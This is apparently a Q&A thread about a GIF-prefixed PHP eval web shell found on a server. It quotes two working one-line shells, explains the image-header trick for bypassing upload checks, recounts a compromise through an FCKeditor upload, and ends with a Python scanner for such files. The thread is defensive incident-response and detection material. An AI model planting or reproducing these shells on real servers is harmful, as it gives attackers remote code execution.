I found this file on my server, it contains the following code:
GIF89a
<?php eval ($_POST[plm12345plm]); ?>
There is no other code beside that one above. Is this malicious?
Yes, this is rogue. This script will execute any PHP code passed as the plm12345plm POST parameter. This means an attacker can execute arbitrary PHP and -- depending on the server configuration -- further code on your server.
The first GIF89a line is likely placed to bypass basic file verification during upload of the script as a GIF image.
If the file could actually be executed, consider the server as compromised. If it is not executable directly, it still could be exploited using local file inclusion attacks.
Yes, this is a PHP web shell. Eval should be the red flag.
Basically, if the user can access this file on your server, they may be able to execute OS commands. If you have properly implemented your site, the attacker should not be able to trick PHP into executing the code in what I am assuming is a .GIF file.
However, if I were you I would batten down the hatches and start your incident response procedures. Someone definitely attempted to break in, and without further research, you won't know if they succeeded.
My server was hacked with the same method. My Server ISP saw huge netload and took the server offline and informed me.
File ali.jpg has textual code: GIF89a?lovealihack <?php eval($_POST[alihackxx])?>
This file had been waiting at least since the beginning of 2015 (I traced it back in my backups). It is located in the writable site URL/userfiles/Image directory. When it is called from an outside form with the variable alihackxx via the POST method, with PHP code in that variable, the Apache server executes it as the www-data user, and it contaminated ALL the sites with a writable directory (Media, FILE) and a lot of JPG and PHP files used to attack other servers.
It is most likely caused by the (old) FCKeditor I use on all sites, which allows the user to upload a picture that will be inserted in the user's site page. There is also a way of pushing data into a writable site/writable directory via the PUT method. It is possible to turn the usage of this method off.
Immediate solution/prevention:
I am shocked to see such a simple vulnerability. I have bad feelings about being hacked.
I changed all (site URL) 777 (writable) directories to 755, writable only for the FTP/server user, so Apache (www-data user) cannot write in them anymore.
ToDo's:
My customers still need to upload JPGs, MP3s and PDFs.
They must pass a proper upload gateway that scans the file for the malicious <?php and eval( strings.
It is also no fun to adjust the mail forms with file attachments. It is important that file attachments are not stored in a site URL/writable directory.
I hope I have informed you guys about this server hack and that you can prevent your server from being hacked.
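As an added example (not code from any of the answers above), here is a small Python scanner that does what the first answer and the last answer describe from the defender's side: it flags files that carry an image header such as GIF89a but also contain a PHP open tag (the upload-filter bypass), and files that combine eval( with request input (the web-shell signature), and it can walk a writable upload directory such as userfiles/Image. The directory path, the pattern names and the sample bytes are assumptions for illustration.

```python
import os
import re

# Magic bytes of image formats that naive upload checks accept. A file that
# starts with one of these but also carries PHP code is a polyglot like the
# GIF89a / <?php eval($_POST[...]) sample in the question.
IMAGE_MAGICS = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
}

# Patterns worth flagging in a web-writable directory: a PHP open tag, an
# eval call (with or without a space before the parenthesis, as in the
# question), and request input being read.
PHP_PATTERNS = {
    "php_open_tag": re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE),
    "eval_call": re.compile(rb"\beval\s*\(", re.IGNORECASE),
    "request_input": re.compile(rb"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.IGNORECASE),
}


def classify_bytes(data: bytes) -> dict:
    """Report the image type (if any) and which suspicious patterns the bytes contain."""
    image_type = next((n for m, n in IMAGE_MAGICS.items() if data.startswith(m)), None)
    hits = [label for label, pat in PHP_PATTERNS.items() if pat.search(data)]
    return {
        "image_type": image_type,
        "hits": hits,
        # image header plus PHP open tag: the upload-filter bypass from the first answer
        "polyglot": image_type is not None and "php_open_tag" in hits,
        # eval() fed from request input: the web-shell signature, header or not
        "webshell": "eval_call" in hits and "request_input" in hits,
    }


def scan_directory(root: str) -> list:
    """Walk an upload directory (assumed path, e.g. userfiles/Image) and list suspicious files."""
    flagged = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                result = classify_bytes(fh.read())
            if result["polyglot"] or result["webshell"]:
                flagged.append(path)
    return sorted(flagged)
```

These are string heuristics for triage, not proof of cleanliness; the upload gateway itself should additionally re-encode accepted images so that any trailing PHP is discarded, and the writable directory should not be served with PHP execution enabled.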